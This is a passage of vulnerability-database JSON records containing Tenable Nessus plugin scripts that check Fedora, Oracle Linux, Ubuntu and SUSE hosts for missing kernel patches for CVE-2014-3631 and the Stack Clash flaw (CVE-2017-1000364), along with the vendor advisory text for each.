"2021-01-11T00:00:00", "cpe": ["p-cpe:/a:fedoraproject:fedora:kernel", "cpe:/o:fedoraproject:fedora:21"], "id": "FEDORA_2014-10693.NASL", "href": "https://www.tenable.com/plugins/nessus/77794", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Fedora Security Advisory 2014-10693.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(77794);\n script_version(\"1.5\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/11\");\n\n script_cve_id(\"CVE-2014-3631\");\n script_xref(name:\"FEDORA\", value:\"2014-10693\");\n\n script_name(english:\"Fedora 21 : kernel-3.16.2-301.fc21 (2014-10693)\");\n script_summary(english:\"Checks rpm output for the updated package.\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Fedora host is missing a security update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"Fix CVE-2014-3631\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the Fedora security advisory. Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.redhat.com/show_bug.cgi?id=1116347\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.redhat.com/show_bug.cgi?id=1138884\"\n );\n # https://lists.fedoraproject.org/pipermail/package-announce/2014-September/138265.html\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?63aa2b8b\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\"Update the affected kernel package.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:L/AC:L/Au:N/C:C/I:C/A:C\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fedoraproject:fedora:kernel\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:fedoraproject:fedora:21\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2014/09/11\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2014/09/23\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2014-2021 Tenable Network Security, Inc.\");\n script_family(english:\"Fedora Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/RedHat/release\");\nif (isnull(release) || \"Fedora\" >!< release) audit(AUDIT_OS_NOT, \"Fedora\");\nos_ver = eregmatch(pattern: \"Fedora.*release ([0-9]+)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Fedora\");\nos_ver = os_ver[1];\nif (! ereg(pattern:\"^21([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, \"Fedora 21.x\", \"Fedora \" + os_ver);\n\nif (!get_kb_item(\"Host/RedHat/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Fedora\", cpu);\n\nflag = 0;\nif (rpm_check(release:\"FC21\", reference:\"kernel-3.16.2-301.fc21\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:rpm_report_get());\n else security_hole(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"kernel\");\n}\n", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2023-05-18T14:15:48", "description": "Description of changes:\n\n[2.6.39-400.297.4.el6uek]\n- mm: larger stack guard gap, between vmas (Hugh Dickins) [Orabug: 26326145] {CVE-2017-1000364}\n\nThis plugin has been deprecated because the recently released Oracle Linux 5 and 6, ELSA-2017-3592, does not fix any security problems relevant to already running systems. You do not need to take any action to update your systems.", "cvss3": {}, "published": "2017-07-14T00:00:00", "type": "nessus", "title": "Oracle Linux 6 : Unbreakable Enterprise kernel (ELSA-2017-3592) (Stack Clash) (deprecated)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2017-1000364"], "modified": "2017-10-06T00:00:00", "cpe": ["p-cpe:/a:oracle:linux:kernel-uek", "p-cpe:/a:oracle:linux:kernel-uek-debug", "p-cpe:/a:oracle:linux:kernel-uek-debug-devel", "p-cpe:/a:oracle:linux:kernel-uek-devel", "p-cpe:/a:oracle:linux:kernel-uek-doc", "p-cpe:/a:oracle:linux:kernel-uek-firmware", "cpe:/o:oracle:linux:6"], "id": "ORACLELINUX_ELSA-2017-3592.NASL", "href": "https://www.tenable.com/plugins/nessus/101544", "sourceData": "#%NASL_MIN_LEVEL 999999\n\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from Oracle Linux Security Advisory ELSA-2017-3592.\n#\n# @DEPRECATED@\n#\n# Disabled on 2017/07/17. There is no replacement.\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(101544);\n script_version(\"3.8\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/06/03\");\n\n script_cve_id(\"CVE-2017-1000364\");\n script_xref(name:\"IAVA\", value:\"2017-A-0288-S\");\n\n script_name(english:\"Oracle Linux 6 : Unbreakable Enterprise kernel (ELSA-2017-3592) (Stack Clash) (deprecated)\");\n script_summary(english:\"Checks rpm output for the updated packages\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"This plugin has been deprecated.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"Description of changes:\n\n[2.6.39-400.297.4.el6uek]\n- mm: larger stack guard gap, between vmas (Hugh Dickins) [Orabug: \n26326145] {CVE-2017-1000364}\n\nThis plugin has been deprecated because the recently released Oracle\nLinux 5 and 6, ELSA-2017-3592, does not fix any security problems\nrelevant to already running systems. You do not need to take any\naction to update your systems.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://oss.oracle.com/pipermail/el-errata/2017-July/007053.html\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\"n/a\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:L/AC:H/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:F/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'rsh_stack_clash_priv_esc.rb');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:kernel-uek\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:kernel-uek-debug\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:kernel-uek-debug-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:kernel-uek-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:kernel-uek-doc\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:kernel-uek-firmware\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:oracle:linux:6\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2017/07/13\");\n script_set_attribute(attribute:\"in_the_news\", value:\"true\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2017/07/14\");\n script_set_attribute(attribute:\"stig_severity\", value:\"I\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2017-2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Oracle Linux Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/OracleLinux\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\");\n\n exit(0);\n}\n\nexit(0, \"This plugin has been deprecated.\");\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item(\"Host/OracleLinux\")) audit(AUDIT_OS_NOT, \"Oracle Linux\");\nrelease = get_kb_item(\"Host/RedHat/release\");\nif (isnull(release) || !eregmatch(pattern: \"Oracle (?:Linux Server|Enterprise Linux)\", string:release)) audit(AUDIT_OS_NOT, \"Oracle Linux\");\nos_ver = eregmatch(pattern: \"Oracle (?:Linux Server|Enterprise Linux) .*release ([0-9]+(\\.[0-9]+)?)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Oracle Linux\");\nos_ver = os_ver[1];\nif (! ereg(pattern:\"^6([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, \"Oracle Linux 6\", \"Oracle Linux \" + os_ver);\n\nif (!get_kb_item(\"Host/RedHat/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Oracle Linux\", cpu);\n\nflag = 0;\nif (rpm_exists(release:\"EL6\", rpm:\"kernel-uek-2.6.39\") && rpm_check(release:\"EL6\", reference:\"kernel-uek-2.6.39-400.297.4.el6uek\")) flag++;\nif (rpm_exists(release:\"EL6\", rpm:\"kernel-uek-debug-2.6.39\") && rpm_check(release:\"EL6\", reference:\"kernel-uek-debug-2.6.39-400.297.4.el6uek\")) flag++;\nif (rpm_exists(release:\"EL6\", rpm:\"kernel-uek-debug-devel-2.6.39\") && rpm_check(release:\"EL6\", reference:\"kernel-uek-debug-devel-2.6.39-400.297.4.el6uek\")) flag++;\nif (rpm_exists(release:\"EL6\", rpm:\"kernel-uek-devel-2.6.39\") && rpm_check(release:\"EL6\", reference:\"kernel-uek-devel-2.6.39-400.297.4.el6uek\")) flag++;\nif (rpm_exists(release:\"EL6\", rpm:\"kernel-uek-doc-2.6.39\") && rpm_check(release:\"EL6\", reference:\"kernel-uek-doc-2.6.39-400.297.4.el6uek\")) flag++;\nif (rpm_exists(release:\"EL6\", rpm:\"kernel-uek-firmware-2.6.39\") && rpm_check(release:\"EL6\", reference:\"kernel-uek-firmware-2.6.39-400.297.4.el6uek\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_warning(port:0, extra:rpm_report_get());\n else security_warning(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"affected kernel\");\n}\n", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2023-05-18T14:13:47", "description": "USN-3335-1 fixed vulnerabilities in the Linux kernel for Ubuntu 14.04 LTS. This update provides the corresponding updates for the Linux Hardware Enablement (HWE) kernel from Ubuntu 14.04 LTS for Ubuntu 12.04 ESM.\n\nIt was discovered that the stack guard page for processes in the Linux kernel was not sufficiently large enough to prevent overlapping with the heap. An attacker could leverage this with another vulnerability to execute arbitrary code and gain administrative privileges.\n\nNote that Tenable Network Security has extracted the preceding description block directly from the Ubuntu security advisory. Tenable has attempted to automatically clean and format it as much as possible without introducing additional issues.", "cvss3": {}, "published": "2017-06-22T00:00:00", "type": "nessus", "title": "Ubuntu 12.04 LTS : linux-lts-trusty vulnerability (USN-3335-2)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2017-1000364"], "modified": "2023-01-17T00:00:00", "cpe": ["p-cpe:/a:canonical:ubuntu_linux:linux-image-3.13-generic", "p-cpe:/a:canonical:ubuntu_linux:linux-image-3.13-generic-lpae", "p-cpe:/a:canonical:ubuntu_linux:linux-image-generic-lpae-lts-trusty", "p-cpe:/a:canonical:ubuntu_linux:linux-image-generic-lts-trusty", "cpe:/o:canonical:ubuntu_linux:12.04:-:lts"], "id": "UBUNTU_USN-3335-2.NASL", "href": "https://www.tenable.com/plugins/nessus/100987", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from Ubuntu Security Notice USN-3335-2. The text \n# itself is copyright (C) Canonical, Inc. See \n# <http://www.ubuntu.com/usn/>. Ubuntu(R) is a registered \n# trademark of Canonical, Inc.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(100987);\n script_version(\"3.9\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2023/01/17\");\n\n script_cve_id(\"CVE-2017-1000364\");\n script_xref(name:\"USN\", value:\"3335-2\");\n script_xref(name:\"IAVA\", value:\"2017-A-0288-S\");\n\n script_name(english:\"Ubuntu 12.04 LTS : linux-lts-trusty vulnerability (USN-3335-2)\");\n script_summary(english:\"Checks dpkg output for updated packages.\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\n\"The remote Ubuntu host is missing one or more security-related\npatches.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"USN-3335-1 fixed vulnerabilities in the Linux kernel for Ubuntu 14.04\nLTS. This update provides the corresponding updates for the Linux\nHardware Enablement (HWE) kernel from Ubuntu 14.04 LTS for Ubuntu\n12.04 ESM.\n\nIt was discovered that the stack guard page for processes in the Linux\nkernel was not sufficiently large enough to prevent overlapping with\nthe heap. An attacker could leverage this with another vulnerability\nto execute arbitrary code and gain administrative privileges.\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the Ubuntu security advisory. Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.\"\n );\n script_set_attribute(attribute:\"solution\", value:\n\"Update the affected packages. Note that the updated package may not be\nimmediately available from the package repository and its mirrors.\");\n script_set_attribute(attribute:\"risk_factor\", value:\"High\");\n script_set_cvss_temporal_vector(\"CVSS2#E:F/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'Solaris RSH Stack Clash Privilege Escalation');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:linux-image-3.13-generic\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:linux-image-3.13-generic-lpae\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:linux-image-generic-lpae-lts-trusty\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:linux-image-generic-lts-trusty\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:canonical:ubuntu_linux:12.04:-:lts\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2017/06/21\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2017/06/22\");\n script_set_attribute(attribute:\"stig_severity\", value:\"I\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"Ubuntu Security Notice (C) 2017-2023 Canonical, Inc. / NASL script (C) 2017 Tenable Network Security, Inc.\");\n script_family(english:\"Ubuntu Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/cpu\", \"Host/Ubuntu\", \"Host/Ubuntu/release\", \"Host/Debian/dpkg-l\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"ubuntu.inc\");\ninclude(\"misc_func.inc\");\n\nif ( ! get_kb_item(\"Host/local_checks_enabled\") ) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/Ubuntu/release\");\nif ( isnull(release) ) audit(AUDIT_OS_NOT, \"Ubuntu\");\nrelease = chomp(release);\nif (! ereg(pattern:\"^(12\\.04)$\", string:release)) audit(AUDIT_OS_NOT, \"Ubuntu 12.04\", \"Ubuntu \" + release);\nif ( ! get_kb_item(\"Host/Debian/dpkg-l\") ) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\" && 's390' >!< cpu && 'aarch64' >!< cpu) audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Ubuntu\", cpu);\n\nflag = 0;\n\nif (ubuntu_check(osver:\"12.04\", pkgname:\"linux-image-3.13.0-121-generic\", pkgver:\"3.13.0-121.170~precise1\")) flag++;\nif (ubuntu_check(osver:\"12.04\", pkgname:\"linux-image-3.13.0-121-generic-lpae\", pkgver:\"3.13.0-121.170~precise1\")) flag++;\nif (ubuntu_check(osver:\"12.04\", pkgname:\"linux-image-generic-lpae-lts-trusty\", pkgver:\"3.13.0.121.112\")) flag++;\nif (ubuntu_check(osver:\"12.04\", pkgname:\"linux-image-generic-lts-trusty\", pkgver:\"3.13.0.121.112\")) flag++;\n\nif (flag)\n{\n security_report_v4(\n port : 0,\n severity : SECURITY_HOLE,\n extra : ubuntu_report_get()\n );\n exit(0);\n}\nelse\n{\n tested = ubuntu_pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"linux-image-3.13-generic / linux-image-3.13-generic-lpae / etc\");\n}\n", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2023-05-18T14:14:59", "description": "This update for the Linux Kernel 3.12.67-60_64_21 fixes several issues. The following security bugs were fixed :\n\n - CVE-2017-1000364: An issue was discovered in the size of the stack guard page on Linux, specifically a 4k stack guard page is not sufficiently large and can be 'jumped' over (the stack guard page is bypassed) (bsc#1039496).\n\nNote that Tenable Network Security has extracted the preceding description block directly from the SUSE security advisory. Tenable has attempted to automatically clean and format it as much as possible without introducing additional issues.", "cvss3": {}, "published": "2017-07-25T00:00:00", "type": "nessus", "title": "SUSE SLES12 Security Update : kernel (SUSE-SU-2017:1946-1) (Stack Clash)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2017-1000364"], "modified": "2021-01-06T00:00:00", "cpe": ["p-cpe:/a:novell:suse_linux:kgraft-patch-3_12_67-60_64_21-default", "p-cpe:/a:novell:suse_linux:kgraft-patch-3_12_67-60_64_21-xen", "cpe:/o:novell:suse_linux:12"], "id": "SUSE_SU-2017-1946-1.NASL", "href": "https://www.tenable.com/plugins/nessus/101948", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from SUSE update advisory SUSE-SU-2017:1946-1.\n# The text itself is copyright (C) SUSE.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(101948);\n script_version(\"3.11\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/06\");\n\n script_cve_id(\"CVE-2017-1000364\");\n\n script_name(english:\"SUSE SLES12 Security Update : kernel (SUSE-SU-2017:1946-1) (Stack Clash)\");\n script_summary(english:\"Checks rpm output for the updated packages.\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote SUSE host is missing one or more security updates.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"This update for the Linux Kernel 3.12.67-60_64_21 fixes several\nissues. The following security bugs were fixed :\n\n - CVE-2017-1000364: An issue was discovered in the size of\n the stack guard page on Linux, specifically a 4k stack\n guard page is not sufficiently large and can be 'jumped'\n over (the stack guard page is bypassed) (bsc#1039496).\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the SUSE security advisory. Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=1013543\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=1014271\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=1021417\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=1025013\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=1025254\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=1030575\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=1031481\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=1031660\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=1039496\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.suse.com/security/cve/CVE-2017-1000364/\"\n );\n # https://www.suse.com/support/update/announcement/2017/suse-su-20171946-1/\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?0f13c6ce\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\n\"To install this SUSE Security Update use YaST online_update.\nAlternatively you can run the command listed for your product :\n\nSUSE Linux Enterprise Server for SAP 12-SP1:zypper in -t patch\nSUSE-SLE-SAP-12-SP1-2017-1212=1\n\nSUSE Linux Enterprise Server 12-SP1-LTSS:zypper in -t patch\nSUSE-SLE-SERVER-12-SP1-2017-1212=1\n\nTo bring your system up-to-date, use 'zypper patch'.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:L/AC:H/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:F/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:L/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:F/RL:O/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'rsh_stack_clash_priv_esc.rb');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:kgraft-patch-3_12_67-60_64_21-default\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:kgraft-patch-3_12_67-60_64_21-xen\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:novell:suse_linux:12\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2017/06/19\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2017/07/24\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2017/07/25\");\n script_set_attribute(attribute:\"in_the_news\", value:\"true\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2017-2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"SuSE Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/cpu\", \"Host/SuSE/release\", \"Host/SuSE/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/SuSE/release\");\nif (isnull(release) || release !~ \"^(SLED|SLES)\") audit(AUDIT_OS_NOT, \"SUSE\");\nos_ver = pregmatch(pattern: \"^(SLE(S|D)\\d+)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"SUSE\");\nos_ver = os_ver[1];\nif (! preg(pattern:\"^(SLES12)$\", string:os_ver)) audit(AUDIT_OS_NOT, \"SUSE SLES12\", \"SUSE \" + os_ver);\n\nif (!get_kb_item(\"Host/SuSE/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (cpu !~ \"^i[3-6]86$\" && \"x86_64\" >!< cpu && \"s390x\" >!< cpu) audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"SUSE \" + os_ver, cpu);\nif (cpu >!< \"x86_64\") audit(AUDIT_ARCH_NOT, \"x86_64\", cpu);\n\n\nsp = get_kb_item(\"Host/SuSE/patchlevel\");\nif (isnull(sp)) sp = \"0\";\nif (os_ver == \"SLES12\" && (! preg(pattern:\"^(1)$\", string:sp))) audit(AUDIT_OS_NOT, \"SLES12 SP1\", os_ver + \" SP\" + sp);\n\n\nflag = 0;\nif (rpm_check(release:\"SLES12\", sp:\"1\", cpu:\"x86_64\", reference:\"kgraft-patch-3_12_67-60_64_21-default-7-3.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"1\", cpu:\"x86_64\", reference:\"kgraft-patch-3_12_67-60_64_21-xen-7-3.1\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_warning(port:0, extra:rpm_report_get());\n else security_warning(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"kernel\");\n}\n", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2023-05-18T14:14:59", "description": "This update for the Linux Kernel 3.12.61-52_77 fixes several issues.\nThe following bugs were fixed :\n\n - CVE-2017-1000364: The previous fix for the stack gap increase tracked by CVE-2017-1000364 had a regression, which is fixed by this follow up patch. (bsc#1039496)\n\nNote that Tenable Network Security has extracted the preceding description block directly from the SUSE security advisory. Tenable has attempted to automatically clean and format it as much as possible without introducing additional issues.", "cvss3": {}, "published": "2017-07-21T00:00:00", "type": "nessus", "title": "SUSE SLES12 Security Update : kernel (SUSE-SU-2017:1912-1) (Stack Clash)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2017-1000364"], "modified": "2021-01-06T00:00:00", "cpe": ["p-cpe:/a:novell:suse_linux:kgraft-patch-3_12_61-52_77-default", "p-cpe:/a:novell:suse_linux:kgraft-patch-3_12_61-52_77-xen", "cpe:/o:novell:suse_linux:12"], "id": "SUSE_SU-2017-1912-1.NASL", "href": "https://www.tenable.com/plugins/nessus/101889", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from SUSE update advisory SUSE-SU-2017:1912-1.\n# The text itself is copyright (C) SUSE.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(101889);\n script_version(\"3.11\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/06\");\n\n script_cve_id(\"CVE-2017-1000364\");\n\n script_name(english:\"SUSE SLES12 Security Update : kernel (SUSE-SU-2017:1912-1) (Stack Clash)\");\n script_summary(english:\"Checks rpm output for the updated packages.\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote SUSE host is missing one or more security updates.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"This update for the Linux Kernel 3.12.61-52_77 fixes several issues.\nThe following bugs were fixed :\n\n - CVE-2017-1000364: The previous fix for the stack gap\n increase tracked by CVE-2017-1000364 had a regression,\n which is fixed by this follow up patch. (bsc#1039496)\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the SUSE security advisory. Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=1039348\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=1039496\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=1045340\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=1045406\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.suse.com/security/cve/CVE-2017-1000364/\"\n );\n # 